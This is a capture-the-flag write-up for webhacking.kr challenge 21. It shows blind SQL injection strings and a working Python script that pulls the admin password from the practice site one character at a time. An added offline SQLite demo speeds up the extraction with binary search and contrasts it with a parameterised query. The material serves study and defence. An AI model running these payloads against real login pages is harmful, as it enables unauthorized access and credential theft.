
Web Hacking Challenge 21 (webhacking.kr old 21)

by H232C 2020. 1. 3.

1. Attack type: Blind SQL Injection

2. Write-up

Challenge 21 initial screen (screenshot)
Entering guest: "Login Success"


Entering admin: "Login Failed"
Inserting an injection string (admin' or '1'='1) prints "wrong password" -> the response differs depending on the injected condition, so a blind injection can be performed
Adding one condition to the injection string (admin' and length(id)=5 or '1'=0) -> "wrong password" is printed only when the AND condition is true; since '1'=0 is always false, that response works as a true/false oracle for any condition on the admin row
Length of the admin pw: 36

Script written to carry out the blind SQL injection (first the password length, then one character at a time)

import requests
import urllib3

urllib3.disable_warnings()  # verify=False below would otherwise print an InsecureRequestWarning per request
s = requests.Session()

# Route every request through a local intercepting proxy (e.g. Burp on port 8000) to inspect the traffic
proxyList = {'http': '127.0.0.1:8000',
             'https': '127.0.0.1:8000'}

# String the challenge page prints when the injected condition is true (see the manual tests above)
TrustKey = "wrong password"

def login():
    # Log in to webhacking.kr first so the challenge page accepts this session.
    # The credentials were left blank in the write-up; fill in your own account.
    url = 'https://webhacking.kr/login.php?login'
    login = {'id': '',
             'pw': ''}

    response = s.post(url, data=login, proxies=proxyList, verify=False)
    print(response.status_code)
    print(response.text)

def payload2():
    login(); code = ''
    leng = None

    # Step 1: find the password length. The trailing "or id='garbage" only closes the quote;
    # no such id exists, so "wrong password" appears only when length(pw)={} holds for admin.
    for i in range(1, 50):
        url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin'+and+length(pw)={}+or+id='garbage&pw=123qwe".format(i)
        response = s.get(url, proxies=proxyList, verify=False)
        res = response.text

        if res.find(TrustKey) != -1:
            leng = i
            print("[-]Find Out Length Of PW : {}".format(leng))
            break

    if leng is None:
        print("[!] Password length not found; check the session cookie and the oracle string")
        return

    # Step 2: recover each character by testing its ASCII code. The range covers printable
    # ASCII (32..126); starting at 65 would skip digits and most punctuation, and a skipped
    # character shifts every position after it.
    for i in range(1, leng + 1):
        for j in range(32, 127):
            url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin'+and+ascii(substr(pw,{},1))='{}'+or+id='garbage&pw=123qwe".format(i, j)
            response = s.get(url, proxies=proxyList, verify=False)
            res = response.text

            if res.find(TrustKey) != -1:
                code = code + chr(j)
                print("[-]Find Out PW : {}".format(code))
                break

    print(code)

payload2()
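The same boolean oracle reproduced offline, as an added example that is not part of the original write-up: an assumed vulnerable login routine over a local SQLite table (the table name chall21, the id/pw columns, the server-side logic and the admin password are all invented for this example, since the page does not show the challenge source), the length-then-character extraction run against it, and a parameterised login beside it to show the oracle going dark. The character loop uses binary search on the ASCII value, which generalises the page's one-value-at-a-time scan; an ascii() function is registered on the connection so the page's MySQL payloads run unchanged on SQLite.

```python
import sqlite3

# Constructed sample data for this example. The admin password is invented and is
# NOT the real challenge's value; the table/column names are assumptions as well.
SAMPLE_ROWS = [("guest", "guest"), ("admin", "s3cret-Pa55w0rd_2020")]
STATS = {"queries": 0}  # counts how many "requests" an extraction costs


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE chall21 (id TEXT, pw TEXT)")
    conn.executemany("INSERT INTO chall21 VALUES (?, ?)", SAMPLE_ROWS)
    # SQLite has no ascii(); register one so the MySQL-style payloads work unchanged.
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    return conn


def vulnerable_login(conn, user_id, user_pw):
    """Assumed server logic: id and pw are concatenated into the query, then the
    stored pw of the fetched row is compared with the submitted one."""
    STATS["queries"] += 1
    sql = "SELECT id, pw FROM chall21 WHERE id='%s' AND pw='%s'" % (user_id, user_pw)
    row = conn.execute(sql).fetchone()
    if row is None:
        return "Login Failed"
    if row[1] == user_pw:
        return "Login Success"
    return "wrong password"  # a row was fetched, but the submitted pw does not match


def safe_login(conn, user_id, user_pw):
    """Hardened form: parameterised query, so the quote in the payload is just data."""
    sql = "SELECT id, pw FROM chall21 WHERE id=? AND pw=?"
    row = conn.execute(sql, (user_id, user_pw)).fetchone()
    return "Login Success" if row else "Login Failed"


def oracle(conn, condition, login=vulnerable_login):
    """True when the injected condition holds for admin's row. 'garbage' is a
    non-existent id, so the OR branch matches nothing and only closes the quote."""
    payload = "admin' and %s or id='garbage" % condition
    return login(conn, payload, "123qwe") == "wrong password"


def find_length(conn, max_len=64):
    for n in range(1, max_len + 1):
        if oracle(conn, "length(pw)=%d" % n):
            return n
    return None


def extract_password(conn, length):
    """Binary search over printable ASCII (32..126): at most 7 queries per
    character instead of up to 95 with a linear scan."""
    pw = ""
    for i in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, "ascii(substr(pw,%d,1))>%d" % (i, mid)):
                lo = mid + 1
            else:
                hi = mid
        pw += chr(lo)
    return pw


def run_attack(conn):
    """Returns (length, recovered password, number of queries used)."""
    STATS["queries"] = 0
    length = find_length(conn)
    pw = extract_password(conn, length)
    return length, pw, STATS["queries"]


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_login(db, "guest", "guest"))           # Login Success
    print(vulnerable_login(db, "admin' or '1'='1", "x"))    # wrong password
    print(run_attack(db))
    print(oracle(db, "length(pw)=20", login=safe_login))    # False: no oracle left
```

Against the parameterised login the payload is compared literally as an id, no row is ever fetched, and the response is "Login Failed" for every condition, so there is nothing left to binary-search.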

Solved
